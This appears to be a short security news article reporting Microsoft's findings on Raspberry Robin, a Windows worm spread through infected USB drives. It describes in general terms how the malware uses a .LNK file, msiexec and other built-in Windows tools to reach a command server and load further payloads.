A sophisticated Windows malware named Raspberry Robin was detected on hundreds of networks of different companies worldwide. First identified last September, the malware is distributed through compromised USB drives.
While the experts said that the malware was found across different sectors, the campaign targeted the tech and manufacturing companies most. From Microsoft’s report, the Windows malware was observed connected to the Tor network addresses; however, its operators have not yet abused this access to bypass Windows User Account Control and escalate their attacks.
The infected USB devices contain a malicious [.]LNK file, which begins the spread of the Raspberry Robin Windows malware.
If an individual click on the malicious link inside the compromised flash drive, the malware will load a msiexec process using cmd[.]exe to launch itself towards the victim’s computer. Once inside a machine, Raspberry Robin would communicate with its remote C2 server and begin deploying additional payloads via legitimate Windows tools, such as msiexec, fodhelper, and odbcconf.
Contrary to the old beliefs that msiexec[.]exe is a virus, the Windows tool could also download and launch legitimate installer packages. However, threat actors also use the tool to propagate malware and other malicious payloads to compromise their victims’ machines.
According to the security researchers, the Raspberry Robin malware uses the msiexec[.]exe Windows tool to attempt communication with an external network (C2 server) to a malicious domain. The experts also added that there is yet to be a specific group linked to the Raspberry Robin malware and that they are still on the hunt to identify the objectives of the unknown adversaries against their victims.
Nonetheless, the tech giant had tagged the campaign as high-risk since the threat operators are capable of downloading and launching more malicious payloads and malware to the targeted networks, including that these actors could also elevate their access privileges at any time they need.
